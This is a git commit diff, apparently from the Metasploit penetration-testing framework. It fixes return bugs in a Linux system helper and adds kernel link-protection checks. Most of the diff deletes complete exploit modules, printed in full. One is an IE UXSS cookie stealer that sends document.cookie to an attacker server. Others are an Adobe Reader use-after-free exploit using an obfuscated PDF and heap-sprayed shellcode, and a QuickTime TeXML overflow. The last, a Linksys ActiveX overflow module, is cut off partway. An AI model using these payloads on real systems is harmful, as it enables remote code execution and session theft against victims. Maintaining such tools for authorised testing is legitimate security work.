Add new functions and fix return bugs
This commit is contained in:
parent
57e243ac49
commit
1e34a6d3c6
|
@ -111,7 +111,7 @@ module System
|
|||
services = {}
|
||||
begin
|
||||
full = cmd_exec('netstat -tulpn')
|
||||
raise "You must be root to get listening ports" if full =~ /\(No info could be read/
|
||||
raise "You must be root to get listening ports" if full.include? '(No info could be read'
|
||||
lines = full.split("\n").size
|
||||
cmd = "netstat -tulpn | tail -n #{lines - 2}"
|
||||
full = cmd_exec(cmd)
|
||||
|
@ -122,7 +122,7 @@ module System
|
|||
full.split("\n").each do |p|
|
||||
ports << p.split('/')[1]
|
||||
end
|
||||
ports
|
||||
return ports
|
||||
else
|
||||
full.split("\n").each do |s|
|
||||
split = s.split('/')
|
||||
|
@ -167,9 +167,9 @@ module System
|
|||
cpuinfo = orig.split("\n\n")[0]
|
||||
# This is probably a more platform independent way to parse the results (compared to splitting and assigning preset indices to values)
|
||||
cpuinfo.split("\n").each do |l|
|
||||
info[:speed_mhz] = l.split(': ')[1].to_i if l =~ /cpu MHz/
|
||||
info[:product] = l.split(': ')[1] if l =~ /model name/
|
||||
info[:vendor] = l.split(': ')[1] if l =~ /vendor_id/
|
||||
info[:speed_mhz] = l.split(': ')[1].to_i if l.include? 'cpu MHz'
|
||||
info[:product] = l.split(': ')[1] if l.include? 'model name'
|
||||
info[:vendor] = l.split(': ')[1] if l.include? 'vendor_id'
|
||||
end
|
||||
info[:cores] = orig.split("\n\n").size
|
||||
info
|
||||
|
@ -237,7 +237,7 @@ module System
|
|||
pids = []
|
||||
full = cmd_exec('ps aux').to_s
|
||||
full.split("\n").each do |pid|
|
||||
pids << pid.split(' ')[1].to_i if pid =~ /#{program}/
|
||||
pids << pid.split(' ')[1].to_i if pid.include? program
|
||||
end
|
||||
pids
|
||||
end
|
||||
|
@ -249,7 +249,7 @@ module System
|
|||
def noexec?(mount_path)
|
||||
mount = cmd_exec('cat /proc/mounts').to_s
|
||||
mount.lines.each do |l|
|
||||
true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
|
||||
return true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
|
||||
end
|
||||
false
|
||||
rescue
|
||||
|
@ -263,13 +263,33 @@ module System
|
|||
def nosuid?(mount_path)
|
||||
mount = cmd_exec('cat /proc/mounts').to_s
|
||||
mount.lines.each do |l|
|
||||
true if l =~ Regexp.new("#{mount_path} (.*)nosuid(.*)")
|
||||
return true if l =~ Regexp.new("#{mount_path} (.*)nosuid(.*)")
|
||||
end
|
||||
false
|
||||
rescue
|
||||
raise 'Unable to check for nosuid volume'
|
||||
end
|
||||
|
||||
#
|
||||
# Checks for protected hardlinks on the system
|
||||
# @return [Boolean]
|
||||
#
|
||||
def protected_hardlinks?
|
||||
read_file('/proc/sys/fs/protected_hardlinks').to_s.eql? '1'
|
||||
rescue
|
||||
raise 'Could not determine protected_hardlinks status'
|
||||
end
|
||||
|
||||
#
|
||||
# Checks for protected symlinks on the system
|
||||
# @return [Boolean]
|
||||
#
|
||||
def protected_symlinks?
|
||||
read_file('/proc/sys/fs/protected_symlinks').to_s.eql? '1'
|
||||
rescue
|
||||
raise 'Could not determine protected_symlinks status'
|
||||
end
|
||||
|
||||
|
||||
end # System
|
||||
end # Linux
|
||||
|
|
|
@ -1,152 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
|
||||
'Description' => %q{
|
||||
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
|
||||
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
|
||||
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
|
||||
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
|
||||
you are behind NAT.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'David Leo', # Original discovery
|
||||
'filedescriptor', # PoC
|
||||
'joev', # He figured it out really
|
||||
'sinn3r' # MSF
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-0072' ],
|
||||
[ 'OSVDB', '117876' ],
|
||||
[ 'MSB', 'MS15-018' ],
|
||||
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'DisclosureDate' => "Feb 1 2015"
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
|
||||
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
|
||||
])
|
||||
end
|
||||
|
||||
def setup
|
||||
if target_uri !~ /^http/i
|
||||
raise Msf::OptionValidateError.new(['TARGET_URI'])
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def target_uri
|
||||
datastore['TARGET_URI']
|
||||
end
|
||||
|
||||
def get_html
|
||||
@html ||= html
|
||||
end
|
||||
|
||||
def ninja_cookie_stealer_name
|
||||
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
|
||||
end
|
||||
|
||||
def get_uri(cli=self.cli)
|
||||
ssl = datastore["SSL"]
|
||||
proto = (ssl ? "https://" : "http://")
|
||||
if datastore['URIHOST']
|
||||
host = datastore['URIHOST']
|
||||
elsif (cli and cli.peerhost)
|
||||
host = Rex::Socket.source_address(cli.peerhost)
|
||||
else
|
||||
host = srvhost_addr
|
||||
end
|
||||
|
||||
if Rex::Socket.is_ipv6?(host)
|
||||
host = "[#{host}]"
|
||||
end
|
||||
|
||||
if datastore['URIPORT']
|
||||
port = ':' + datastore['URIPORT'].to_s
|
||||
elsif (ssl and datastore["SRVPORT"] == 443)
|
||||
port = ''
|
||||
elsif (!ssl and datastore["SRVPORT"] == 80)
|
||||
port = ''
|
||||
else
|
||||
port = ":" + datastore["SRVPORT"].to_s
|
||||
end
|
||||
|
||||
uri = proto + host + port + get_resource
|
||||
|
||||
uri
|
||||
end
|
||||
|
||||
def server_uri
|
||||
@server_uri ||= get_uri
|
||||
end
|
||||
|
||||
def js
|
||||
datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
|
||||
end
|
||||
|
||||
def html
|
||||
%Q|
|
||||
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
|
||||
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
|
||||
<script>
|
||||
window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
|
||||
var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
|
||||
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
|
||||
</script>
|
||||
|
|
||||
end
|
||||
|
||||
def run
|
||||
exploit
|
||||
end
|
||||
|
||||
def extract_cookie(uri)
|
||||
Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
case request.uri
|
||||
when /redirect\.php/
|
||||
print_status("Sending redirect")
|
||||
send_redirect(cli, "#{datastore['TARGET_URI']}")
|
||||
when /sleep\.php/
|
||||
sleep(3)
|
||||
send_response(cli, '')
|
||||
when /#{ninja_cookie_stealer_name}/
|
||||
data = extract_cookie(request.uri)
|
||||
if data.blank?
|
||||
print_status("The XSS worked, but no cookie")
|
||||
else
|
||||
print_status("Got cookie")
|
||||
print_line(data)
|
||||
report_note(
|
||||
:host => cli.peerhost,
|
||||
:type => 'ie.cookie',
|
||||
:data => data
|
||||
)
|
||||
path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
|
||||
vprint_good("Cookie stored as: #{path}")
|
||||
end
|
||||
else
|
||||
print_status("Sending HTML")
|
||||
send_response(cli, get_html)
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,220 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'zlib'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
|
||||
Professional versions up to and including 9.2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # Found in the wild
|
||||
# Metasploit version by:
|
||||
'hdm',
|
||||
'pusscat',
|
||||
'jduck',
|
||||
'jabra'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-4324' ],
|
||||
[ 'BID', '37331' ],
|
||||
[ 'OSVDB', '60980' ],
|
||||
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-02.html' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# test results (on Windows XP SP3)
|
||||
# reader 6.0.1 - vulnerable / doesn't work
|
||||
# reader 7.0.5 - untested
|
||||
# reader 7.0.8 - untested
|
||||
# reader 7.0.9 - vulnerable / doesn't work
|
||||
# reader 7.1.0 - untested
|
||||
# reader 7.1.1 - untested
|
||||
# reader 8.0.0 - untested
|
||||
# reader 8.1.1 - works
|
||||
# reader 8.1.2 - untested
|
||||
# reader 8.1.3 - untested
|
||||
# reader 8.1.4 - untested
|
||||
# reader 8.1.5 - untested
|
||||
# reader 8.1.6 - untested
|
||||
# reader 9.0.0 - untested
|
||||
# reader 9.1.0 - works
|
||||
# reader 9.2 - works (no debugger, no DEP)
|
||||
[ 'Adobe Reader Windows English (JS Heap Spray)',
|
||||
{
|
||||
'Size' => (0x10000/2),
|
||||
'Ret' => 0x0c0c0c0c
|
||||
}
|
||||
],
|
||||
[ 'Adobe Reader Windows German (JS Heap Spray)',
|
||||
{
|
||||
'Size' => (0x10000/2),
|
||||
'Ret' => 0x0a0a0a0a
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 14 2009',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check_dependencies
|
||||
use_zlib
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Make some nops
|
||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
# Randomize variables
|
||||
#
|
||||
len = 72
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
vtbuf = [target.ret].pack('V') * 4
|
||||
vtbuf << rand_text_alpha(len - vtbuf.length)
|
||||
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
|
||||
retstring = Rex::Text.to_unescape(vtbuf)
|
||||
|
||||
# The printd strings are 72 bytes (??)
|
||||
script = %Q|
|
||||
var #{randnop} = "#{nops}";
|
||||
var #{rand1} = unescape("#{shellcode}");
|
||||
var #{rand2} = unescape(#{randnop});
|
||||
var #{rand3} = unescape("#{retstring}");
|
||||
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
|
||||
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
|
||||
memory=new Array();
|
||||
for(i=0;i<0x2000;i++) { memory[i]= #{rand2} + #{rand1}; }
|
||||
util.printd("#{rand4}", new Date());
|
||||
util.printd("#{rand5}", new Date());
|
||||
try {this.media.newPlayer(null);} catch(e) {}
|
||||
util.printd(#{rand3}, new Date());
|
||||
|
|
||||
# Create the pdf
|
||||
pdf = make_pdf(script)
|
||||
|
||||
print_status("Sending #{self.name}")
|
||||
|
||||
send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })
|
||||
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
def random_non_ascii_string(count)
|
||||
result = ""
|
||||
count.times do
|
||||
result << (rand(128) + 128).chr
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def io_def(id)
|
||||
"%d 0 obj" % id
|
||||
end
|
||||
|
||||
def io_ref(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def n_obfu(str)
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
|
||||
result << "#%x" % c.unpack("C*")[0]
|
||||
else
|
||||
result << c
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def ascii_hex_whitespace_encode(str)
|
||||
result = ""
|
||||
whitespace = ""
|
||||
str.each_byte do |b|
|
||||
result << whitespace << "%02x" % b
|
||||
whitespace = " " * (rand(3) + 1)
|
||||
end
|
||||
result << ">"
|
||||
end
|
||||
|
||||
def make_pdf(js)
|
||||
|
||||
xref = []
|
||||
eol = "\x0d\x0a"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
|
||||
pdf = "%PDF-1.5" << eol
|
||||
pdf << "%" << random_non_ascii_string(4) << eol
|
||||
xref << pdf.length
|
||||
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
|
||||
xref << pdf.length
|
||||
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
|
||||
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
pdf << "0 %d" % (xref.length + 1) << eol
|
||||
pdf << "0000000000 65535 f" << eol
|
||||
xref.each do |index|
|
||||
pdf << "%010d 00000 n" % index << eol
|
||||
end
|
||||
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
|
||||
pdf << "startxref" << eol
|
||||
pdf << xrefPosition.to_s() << eol
|
||||
pdf << "%%EOF" << eol
|
||||
|
||||
end
|
||||
end
|
|
@ -1,299 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#autopwn_info({
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking
|
||||
#})
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Apple QuickTime. When handling
|
||||
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
|
||||
gain arbitrary code execution under the context of the user. This is due to the
|
||||
QuickTime3GPP.gtx component not handling certain Style subfields properly, as the
|
||||
font-table field, which is used to trigger the overflow in this module. Because of
|
||||
QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be
|
||||
used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module
|
||||
has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Arezou Hosseinzad-Amirkhizi', # Vulnerability Discovery
|
||||
'juan vazquez' # Metasploit Module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '87087' ],
|
||||
[ 'CVE', '2012-3752' ],
|
||||
[ 'BID', '56557' ],
|
||||
[ 'URL', 'http://support.apple.com/kb/HT5581' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested with QuickTime 7.7.2
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 6 on Windows XP SP3', {} ],
|
||||
[ 'Firefox 3.5 on Windows XP SP3', {} ],
|
||||
[ 'Firefox 3.5.1 on Windows XP SP3', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Nov 07 2012',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
||||
])
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
|
||||
browser_name = ""
|
||||
if agent =~ /MSIE/
|
||||
browser_version = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
browser_name = "IE #{browser_version}"
|
||||
elsif agent =~ /Firefox\/3.5$/
|
||||
browser_name = "Firefox 3.5 "
|
||||
elsif agent =~ /Firefox\/3.5.1$/
|
||||
browser_name = "Firefox 3.5.1"
|
||||
elsif agent =~ /Opera\/9/
|
||||
browser_name = "Opera"
|
||||
end
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
print_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(client, request)
|
||||
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
# Avoid the attack if no suitable target found
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.3gp/
|
||||
print_status("Sending exploit TEXML (target: #{my_target.name})")
|
||||
|
||||
my_payload = "1" * (1024*16)
|
||||
|
||||
texml = <<-eos
|
||||
<?xml version="1.0"?>
|
||||
<?quicktime type="application/x-quicktime-texml"?>
|
||||
|
||||
<text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
|
||||
language="eng" timeScale="600"
|
||||
transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
|
||||
<sample duration="2400" keyframe="true">
|
||||
|
||||
<description format="tx3g" displayFlags="ScrollIn"
|
||||
horizontalJustification="Left"
|
||||
verticalJustification="Top"
|
||||
backgroundColor="0%, 0%, 0%, 100%">
|
||||
|
||||
<defaultTextBox x="0" y="0" width="176" height="60"/>
|
||||
<fontTable>
|
||||
<font id="1" name="Times"/>
|
||||
</fontTable>
|
||||
|
||||
<sharedStyles>
|
||||
<style id="1">
|
||||
{font-table: #{my_payload}}
|
||||
{font-style:normal}
|
||||
{font-weight: normal}
|
||||
{font-size: 10}
|
||||
{line-height: 100%}
|
||||
{text-align: right}
|
||||
{text-decoration: underline}
|
||||
{color: 100%, 100%, 100%, 100%}
|
||||
{backgroundcolor: 100%, 100%, 100%, 100%}
|
||||
</style>
|
||||
</sharedStyles>
|
||||
</description>
|
||||
|
||||
<sampleData scrollDelay="200"
|
||||
highlightColor="25%, 45%, 65%, 100%"
|
||||
targetEncoding="utf8">
|
||||
|
||||
<textBox x="10" y="10" width="156" height="40"/>
|
||||
<text styleID="1">What you need... Metasploit!</text>
|
||||
<highlight startMarker="1" endMarker="2"/>
|
||||
<blink startMarker="3" endMarker="4"/>
|
||||
</sampleData>
|
||||
</sample>
|
||||
</text3GTrack>
|
||||
eos
|
||||
|
||||
send_response(client, texml, { 'Content-Type' => "application/x-quicktime-texml" })
|
||||
|
||||
else
|
||||
print_status("Sending initial HTML")
|
||||
|
||||
url = ((datastore['SSL']) ? "https://" : "http://")
|
||||
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
|
||||
url << ":" + datastore['SRVPORT'].to_s
|
||||
url << get_resource
|
||||
|
||||
fname = rand_text_alphanumeric(4)
|
||||
|
||||
#ARCH used by the victim machine
|
||||
arch = Rex::Arch.endian(my_target.arch)
|
||||
nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
|
||||
code = Rex::Text.to_unescape(payload.encoded, arch)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
# Spray puts payload on 0x31313131
|
||||
if my_target.name =~ /IE/
|
||||
spray = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{code}");
|
||||
var #{randnop} = "#{nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
var offset = nops.substring(0, 0x800 - code.length);
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
heap_obj.gc();
|
||||
for (var i=0; i < 1600; i++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
JS
|
||||
|
||||
#Use heaplib
|
||||
js_spray = heaplib(spray)
|
||||
|
||||
#obfuscate on demand
|
||||
if datastore['OBFUSCATE']
|
||||
js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
|
||||
js_spray.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
else
|
||||
js_spray = <<-JS
|
||||
var shellcode = unescape("#{code}");
|
||||
var #{randnop} = "#{nops}";
|
||||
var bigblock = unescape(#{randnop});
|
||||
var headersize = 20;
|
||||
var slackspace = headersize + shellcode.length;
|
||||
while (bigblock.length < slackspace) bigblock += bigblock;
|
||||
var fillblock = bigblock.substring(0,slackspace);
|
||||
var block = bigblock.substring(0,bigblock.length - slackspace);
|
||||
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
|
||||
var memory = new Array();
|
||||
for (i = 0; i < 750; i++){ memory[i] = block + shellcode }
|
||||
JS
|
||||
end
|
||||
|
||||
content = "<html>"
|
||||
content << <<-JSPRAY
|
||||
<head>
|
||||
<script>
|
||||
#{js_spray}
|
||||
</script>
|
||||
</head>
|
||||
JSPRAY
|
||||
content << "<body>"
|
||||
|
||||
content << <<-ENDEMBED
|
||||
<OBJECT
|
||||
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
|
||||
WIDTH="1"
|
||||
HEIGHT="1"
|
||||
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
|
||||
<PARAM name="SRC" VALUE = "#{url}/#{fname}.3gp">
|
||||
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.3gp">
|
||||
<PARAM name="AUTOPLAY" VALUE = "true" >
|
||||
<PARAM name="TYPE" VALUE = "video/quicktime" >
|
||||
<PARAM name="TARGET" VALUE = "myself" >
|
||||
<EMBED
|
||||
SRC = "#{url}/#{fname}.3gp"
|
||||
QTSRC = "#{url}/#{fname}.3gp"
|
||||
TARGET = "myself"
|
||||
WIDTH = "1"
|
||||
HEIGHT = "1"
|
||||
AUTOPLAY = "true"
|
||||
PLUGIN = "quicktimeplugin"
|
||||
TYPE = "video/quicktime"
|
||||
CACHE = "false"
|
||||
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
|
||||
</EMBED>
|
||||
</OBJECT>
|
||||
ENDEMBED
|
||||
|
||||
content << "</body></html>"
|
||||
|
||||
send_response(client, content, { 'Content-Type' => "text/html" })
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
=begin
|
||||
* Routine checking only for '1'-'9' chars for the vaules on the vulnerable style fields (font-table, font-size and line-height)
|
||||
|
||||
int __fastcall sub_67EED2B0(int a1, int a2)
|
||||
{
|
||||
int result; // eax@1
|
||||
unsigned __int8 v3; // cl@2
|
||||
|
||||
for ( result = 0; ; ++result )
|
||||
{
|
||||
v3 = *(_BYTE *)a2++ - 0x30;
|
||||
if ( v3 > 9u )
|
||||
break;
|
||||
}
|
||||
return result;
|
||||
}
|
||||
=end
|
|
@ -1,255 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::Seh
|
||||
#include Msf::Exploit::Remote::BrowserAutopwn
|
||||
#
|
||||
#autopwn_info({
|
||||
# :ua_name => HttpClients::IE,
|
||||
# :ua_minver => "6.0",
|
||||
# :ua_maxver => "8.0",
|
||||
# :javascript => true,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
|
||||
# :method => "SetSource",
|
||||
# :rank => NormalRanking
|
||||
#})
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco Linksys PlayerPT ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15
|
||||
as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ
|
||||
Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in
|
||||
the SetSource method, allows to trigger a stack based buffer overflow which leads
|
||||
to code execution under the context of the user visiting a malicious web page.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'rgod', # Vuln discovery, PoC
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '80297' ],
|
||||
[ 'EDB', '18641' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x00\x0d\x0a\x5c",
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Cisco Linksys PlayerPT ActiveX Control 1.0.0.15
|
||||
[ 'Automatic', { } ],
|
||||
[
|
||||
'IE 6 on Windows XP SP3',
|
||||
{
|
||||
'Spray' => true,
|
||||
'SprayBlocks' => 0x185,
|
||||
'SprayOffset' => '0x0',
|
||||
'OffsetStackBottom' => 8556
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 7 on Windows XP SP3 / Windows Vista SP2',
|
||||
{
|
||||
'Spray' => true,
|
||||
'SprayBlocks' => 0x185,
